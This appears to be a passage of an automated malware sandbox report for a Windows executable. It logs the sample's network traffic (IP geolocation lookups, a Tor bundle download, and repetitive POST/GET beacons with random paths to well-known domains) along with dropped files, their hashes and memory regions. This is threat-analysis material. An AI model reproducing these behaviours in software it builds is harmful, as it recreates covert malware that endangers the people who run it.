      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: close
    • flag-us
      DNS
      ip-api.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/line?fields=query,country
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /line?fields=query,country HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
    • flag-us
      DNS
      238.16.217.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      238.16.217.172.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      1.112.95.208.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.112.95.208.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      50.251.17.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.251.17.2.in-addr.arpa
      IN PTR
      Response
      50.251.17.2.in-addr.arpa
      IN PTR
      a2-17-251-50deploystaticakamaitechnologiescom
    • flag-us
      DNS
      43.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      43.229.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      50.192.11.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.192.11.51.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      0.204.248.87.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      0.204.248.87.in-addr.arpa
      IN PTR
      Response
      0.204.248.87.in-addr.arpa
      IN PTR
      https-87-248-204-0lhrllnwnet
    • flag-us
      DNS
      159.113.53.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      159.113.53.23.in-addr.arpa
      IN PTR
      Response
      159.113.53.23.in-addr.arpa
      IN PTR
      a23-53-113-159deploystaticakamaitechnologiescom
    • 91.228.166.47:80
      http://eset.com/FMfO1hNIv5?q=0
      http
      m1f1f3a069223072f8d6802a079235d.exe
      425 B
      719 B
      6
      6

      HTTP Request

      POST http://eset.com/FMfO1hNIv5?q=0

      HTTP Response

      301
    • 159.69.63.226:443
      https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      486.2kB
      13.8MB
      7478
      9877

      HTTP Request

      GET https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

      HTTP Response

      200
    • 104.16.29.98:80
      http://blockchain.com/SrTg2TH7BH?q=4
      http
      m1f1f3a069223072f8d6802a079235d.exe
      308 B
      644 B
      5
      4

      HTTP Request

      GET http://blockchain.com/SrTg2TH7BH?q=4

      HTTP Response

      301
    • 104.16.29.98:80
      http://blockchain.com/SrTg2TH7BH?q=4
      http
      m1f1f3a069223072f8d6802a079235d.exe
      402 B
      1.2kB
      6
      5

      HTTP Request

      GET http://blockchain.com/SrTg2TH7BH?q=4

      HTTP Response

      301

      HTTP Request

      GET http://blockchain.com/SrTg2TH7BH?q=4

      HTTP Response

      301
    • 13.107.246.64:80
      http://openai.com/MWPpdfCd2G?q=114
      http
      m1f1f3a069223072f8d6802a079235d.exe
      1.1kB
      1.9kB
      13
      9

      HTTP Request

      POST http://openai.com/ifMwwwu7Vx?q=1

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307
    • 13.107.246.64:443
      https://openai.com/MWPpdfCd2G?q=114
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      1.9kB
      19.6kB
      22
      27

      HTTP Request

      POST https://openai.com/ifMwwwu7Vx?q=1

      HTTP Response

      405

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      404

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      404

      HTTP Response

      404
    • 104.16.30.98:443
      https://www.blockchain.com/SrTg2TH7BH?q=4
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      5.6kB
      205.9kB
      113
      163

      HTTP Request

      GET https://www.blockchain.com/SrTg2TH7BH?q=4

      HTTP Response

      404
    • 104.16.30.98:443
      https://www.blockchain.com/SrTg2TH7BH?q=4
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      4.8kB
      205.7kB
      96
      158

      HTTP Request

      GET https://www.blockchain.com/SrTg2TH7BH?q=4

      HTTP Response

      404
    • 104.117.77.121:443
      https://www.eset.com/FMfO1hNIv5/?q=0
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      3.3kB
      124.1kB
      61
      96

      HTTP Request

      GET https://www.eset.com/FMfO1hNIv5?q=0

      HTTP Response

      301

      HTTP Request

      GET https://www.eset.com/FMfO1hNIv5/?q=0

      HTTP Response

      404
    • 13.107.246.64:443
      https://openai.com/MWPpdfCd2G?q=114
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      1.1kB
      14.6kB
      13
      20

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      404

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      393 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      393 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 104.16.30.98:443
      https://www.blockchain.com/SrTg2TH7BH?q=4
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      4.7kB
      209.8kB
      92
      163

      HTTP Request

      GET https://www.blockchain.com/SrTg2TH7BH?q=4

      HTTP Response

      404
    • 13.107.246.64:80
      http://openai.com/MWPpdfCd2G?q=114
      http
      m1f1f3a069223072f8d6802a079235d.exe
      282 B
      464 B
      5
      4

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      369 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      369 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      369 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      415 B
      2.0kB
      7
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 159.69.63.226:443
      https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      159.8kB
      7.8MB
      3135
      5621

      HTTP Request

      GET https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

      HTTP Response

      200
    • 13.107.246.64:80
      http://openai.com/MWPpdfCd2G?q=114
      http
      m1f1f3a069223072f8d6802a079235d.exe
      1.4kB
      2.9kB
      17
      12

      HTTP Request

      POST http://openai.com/ifMwwwu7Vx?q=1

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307
    • 104.16.30.98:80
      http://blockchain.com/ARmyOO9vJh?q=133
      http
      m1f1f3a069223072f8d6802a079235d.exe
      310 B
      646 B
      5
      4

      HTTP Request

      GET http://blockchain.com/ARmyOO9vJh?q=133

      HTTP Response

      301
    • 104.16.30.98:443
      https://www.blockchain.com/ARmyOO9vJh?q=133
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      5.2kB
      194.6kB
      102
      153

      HTTP Request

      GET https://www.blockchain.com/ARmyOO9vJh?q=133

      HTTP Response

      404
    • 13.107.246.64:443
      https://openai.com/MWPpdfCd2G?q=114
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      2.6kB
      28.8kB
      30
      35

      HTTP Request

      POST https://openai.com/ifMwwwu7Vx?q=1

      HTTP Response

      405

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      404

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      404

      HTTP Response

      404

      HTTP Response

      404

      HTTP Response

      404
    • 216.58.204.78:80
      http://youtube.com/YggOLR313W?q=26
      http
      m1f1f3a069223072f8d6802a079235d.exe
      306 B
      560 B
      5
      4

      HTTP Request

      GET http://youtube.com/YggOLR313W?q=26

      HTTP Response

      301
    • 91.228.166.47:80
      http://eset.com/No0TnWnOx1?q=0
      http
      m1f1f3a069223072f8d6802a079235d.exe
      538 B
      719 B
      6
      6

      HTTP Request

      POST http://eset.com/No0TnWnOx1?q=0

      HTTP Response

      301
    • 13.107.246.64:80
      http://openai.com/MWPpdfCd2G?q=114
      http
      m1f1f3a069223072f8d6802a079235d.exe
      512 B
      1.1kB
      8
      6

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307

      HTTP Request

      GET http://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      307
    • 91.228.166.47:80
      http://eset.com/No0TnWnOx1?q=0
      http
      m1f1f3a069223072f8d6802a079235d.exe
      538 B
      719 B
      6
      6

      HTTP Request

      POST http://eset.com/No0TnWnOx1?q=0

      HTTP Response

      301
    • 13.107.246.64:443
      https://openai.com/MWPpdfCd2G?q=114
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      1.9kB
      28.3kB
      25
      32

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      404

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Request

      GET https://openai.com/MWPpdfCd2G?q=114

      HTTP Response

      404

      HTTP Response

      404

      HTTP Response

      404

      HTTP Response

      404
    • 216.58.204.78:443
      https://youtube.com/YggOLR313W?q=26
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      813 B
      8.7kB
      10
      11

      HTTP Request

      GET https://youtube.com/YggOLR313W?q=26

      HTTP Response

      301
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      393 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      393 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 91.228.166.47:80
      http://eset.com/No0TnWnOx1?q=0
      http
      m1f1f3a069223072f8d6802a079235d.exe
      560 B
      719 B
      7
      6

      HTTP Request

      POST http://eset.com/No0TnWnOx1?q=0

      HTTP Response

      301
    • 104.117.77.144:443
      https://www.eset.com/No0TnWnOx1/?q=0
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      3.1kB
      132.4kB
      56
      105

      HTTP Request

      GET https://www.eset.com/No0TnWnOx1?q=0

      HTTP Response

      301

      HTTP Request

      GET https://www.eset.com/No0TnWnOx1/?q=0

      HTTP Response

      404
    • 104.117.77.144:443
      https://www.eset.com/No0TnWnOx1/?q=0
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      1.8kB
      55.8kB
      28
      49

      HTTP Request

      GET https://www.eset.com/No0TnWnOx1?q=0

      HTTP Response

      301

      HTTP Request

      GET https://www.eset.com/No0TnWnOx1?q=0

      HTTP Response

      301

      HTTP Request

      GET https://www.eset.com/No0TnWnOx1/?q=0
    • 172.217.16.238:443
      https://www.youtube.com/YggOLR313W?q=26
      tls, http
      m1f1f3a069223072f8d6802a079235d.exe
      1.1kB
      10.3kB
      12
      14

      HTTP Request

      GET https://www.youtube.com/YggOLR313W?q=26

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      679 B
      2.2kB
      9
      10

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      369 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 142.250.200.14:80
      http://google.com/dIoqxQcxKt?q=2
      http
      m1f1f3a069223072f8d6802a079235d.exe
      369 B
      2.0kB
      6
      6

      HTTP Request

      POST http://google.com/dIoqxQcxKt?q=2

      HTTP Response

      404
    • 208.95.112.1:80
      http://ip-api.com/line?fields=query,country
      http
      m1f1f3a069223072f8d6802a079235d.exe
      269 B
      132 B
      4
      3

      HTTP Request

      GET http://ip-api.com/line?fields=query,country
    • 104.117.77.144:443
      www.eset.com
      m1f1f3a069223072f8d6802a079235d.exe
      282 B
      14.0kB
      6
      11
    • 52.142.223.178:80
      46 B
      1
    • 8.8.8.8:53
      eset.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      54 B
      86 B
      1
      1

      DNS Request

      eset.com

      DNS Response

      91.228.166.47
      91.228.167.128

    • 8.8.8.8:53
      archive.torproject.org
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      68 B
      109 B
      1
      1

      DNS Request

      archive.torproject.org

      DNS Response

      159.69.63.226

    • 8.8.8.8:53
      blockchain.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      60 B
      92 B
      1
      1

      DNS Request

      blockchain.com

      DNS Response

      104.16.29.98
      104.16.30.98

    • 8.8.8.8:53
      openai.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      56 B
      88 B
      1
      1

      DNS Request

      openai.com

      DNS Response

      13.107.246.64
      13.107.213.64

    • 8.8.8.8:53
      www.blockchain.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      64 B
      96 B
      1
      1

      DNS Request

      www.blockchain.com

      DNS Response

      104.16.30.98
      104.16.29.98

    • 8.8.8.8:53
      www.eset.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      58 B
      204 B
      1
      1

      DNS Request

      www.eset.com

      DNS Response

      104.117.77.121
      104.117.77.144

    • 8.8.8.8:53
      google.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      56 B
      72 B
      1
      1

      DNS Request

      google.com

      DNS Response

      142.250.200.14

    • 8.8.8.8:53
      226.63.69.159.in-addr.arpa
      dns
      144 B
      111 B
      2
      1

      DNS Request

      226.63.69.159.in-addr.arpa

      DNS Request

      226.63.69.159.in-addr.arpa

    • 8.8.8.8:53
      98.29.16.104.in-addr.arpa
      dns
      142 B
      133 B
      2
      1

      DNS Request

      98.29.16.104.in-addr.arpa

      DNS Request

      98.29.16.104.in-addr.arpa

    • 8.8.8.8:53
      47.166.228.91.in-addr.arpa
      dns
      144 B
      112 B
      2
      1

      DNS Request

      47.166.228.91.in-addr.arpa

      DNS Request

      47.166.228.91.in-addr.arpa

    • 8.8.8.8:53
      98.30.16.104.in-addr.arpa
      dns
      142 B
      133 B
      2
      1

      DNS Request

      98.30.16.104.in-addr.arpa

      DNS Request

      98.30.16.104.in-addr.arpa

    • 8.8.8.8:53
      121.77.117.104.in-addr.arpa
      dns
      146 B
      139 B
      2
      1

      DNS Request

      121.77.117.104.in-addr.arpa

      DNS Request

      121.77.117.104.in-addr.arpa

    • 8.8.8.8:53
      14.200.250.142.in-addr.arpa
      dns
      146 B
      112 B
      2
      1

      DNS Request

      14.200.250.142.in-addr.arpa

      DNS Request

      14.200.250.142.in-addr.arpa

    • 8.8.8.8:53
      ip-api.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      112 B
      72 B
      2
      1

      DNS Request

      ip-api.com

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      25.251.17.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      25.251.17.2.in-addr.arpa

    • 8.8.8.8:53
      openai.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      56 B
      88 B
      1
      1

      DNS Request

      openai.com

      DNS Response

      13.107.246.64
      13.107.213.64

    • 8.8.8.8:53
      blockchain.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      60 B
      92 B
      1
      1

      DNS Request

      blockchain.com

      DNS Response

      104.16.30.98
      104.16.29.98

    • 8.8.8.8:53
      youtube.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      57 B
      73 B
      1
      1

      DNS Request

      youtube.com

      DNS Response

      216.58.204.78

    • 8.8.8.8:53
      www.eset.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      58 B
      204 B
      1
      1

      DNS Request

      www.eset.com

      DNS Response

      104.117.77.144
      104.117.77.121

    • 8.8.8.8:53
      www.youtube.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      61 B
      319 B
      1
      1

      DNS Request

      www.youtube.com

      DNS Response


    • 8.8.8.8:53
      144.77.117.104.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      144.77.117.104.in-addr.arpa

    • 8.8.8.8:53
      ip-api.com
      dns
      m1f1f3a069223072f8d6802a079235d.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      238.16.217.172.in-addr.arpa
      dns
      73 B
      1

      DNS Request

      238.16.217.172.in-addr.arpa

    • 8.8.8.8:53
      1.112.95.208.in-addr.arpa
      dns
      71 B
      1

      DNS Request

      1.112.95.208.in-addr.arpa

    • 8.8.8.8:53
      50.251.17.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      50.251.17.2.in-addr.arpa

    • 8.8.8.8:53
      43.229.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      43.229.111.52.in-addr.arpa

    • 8.8.8.8:53
      50.192.11.51.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      50.192.11.51.in-addr.arpa

    • 8.8.8.8:53
      0.204.248.87.in-addr.arpa
      dns
      71 B
      116 B
      1
      1

      DNS Request

      0.204.248.87.in-addr.arpa

    • 8.8.8.8:53
      159.113.53.23.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      159.113.53.23.in-addr.arpa

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\m1f1f3a069223072f8d6802a079235d.exe.log

      Filesize

      847B

      MD5

      a908a7c6e93edeb3e400780b6fe62dde

      SHA1

      36e2b437f41443f6b41b45b35a0f97b2cd94123d

      SHA256

      cae801b0499949178298c1c1a083f7c0febb971d262be9c9588437af66c76ef0

      SHA512

      deb437dcb1440d37bcd61dfa43be05fd01856a1d1e59aa5b2dfa142e9ae584b0577eea024edb99d8e74e3a1b606bb7ae3b4f9cd8eb30813e67dda678b9319cbe

    • C:\Users\Admin\AppData\Local\TeamViewer\m1f1f3a069223072f8d6802a079235d.exe

      Filesize

      306KB

      MD5

      4b36dcaa94c3eca48a6292bd670ffe79

      SHA1

      705484e61ac39ba02cc80903be0da6ce74333334

      SHA256

      c2e57e9b6e52a5429ae7a7bd36c57f63589d78fbf0ffe5760ada4a67b9fadec9

      SHA512

      cf07d7f80264554eb3b945421ca41db38ff79707775d355d478c09f4b64d14f523339295aa4bc9b79c0dbb004e6756585bcf85edc8cbc2d16f7f0481be93513a

    • C:\Users\Admin\AppData\Local\d67800nkmj\port.dat

      Filesize

      4B

      MD5

      e97399278d24e6bbf3a2d5e9c8d34262

      SHA1

      c85a0c05df75988715b67c566ccb8c625d3b74f0

      SHA256

      b9b1195fd5b5620d9b67b2b7157ea132230afb387ca5e6159a34811691656b6d

      SHA512

      ea69b090d6c5eceecde9efa03ba8be10609ea75069076bff60b93cfd01ed4cb2396251f4683cb9fdd2a3145eb0f614ad1aae2c062275dcb6fada8dfb3aaa508d

    • memory/2220-19-0x0000023464D30000-0x0000023464D40000-memory.dmp

      Filesize

      64KB

    • memory/2220-23-0x0000023464D30000-0x0000023464D40000-memory.dmp

      Filesize

      64KB

    • memory/2220-22-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2220-18-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2520-1-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2520-4-0x000001DEEF950000-0x000001DEEF960000-memory.dmp

      Filesize

      64KB

    • memory/2520-6-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2520-0-0x000001DED5420000-0x000001DED5472000-memory.dmp

      Filesize

      328KB

    • memory/4588-11-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

      Filesize

      9.9MB

    • memory/4588-16-0x00000236B1F10000-0x00000236B1F20000-memory.dmp

      Filesize

      64KB

    • memory/4588-15-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

      Filesize

      9.9MB

    • memory/4588-12-0x00000236B1F10000-0x00000236B1F20000-memory.dmp

      Filesize

      64KB
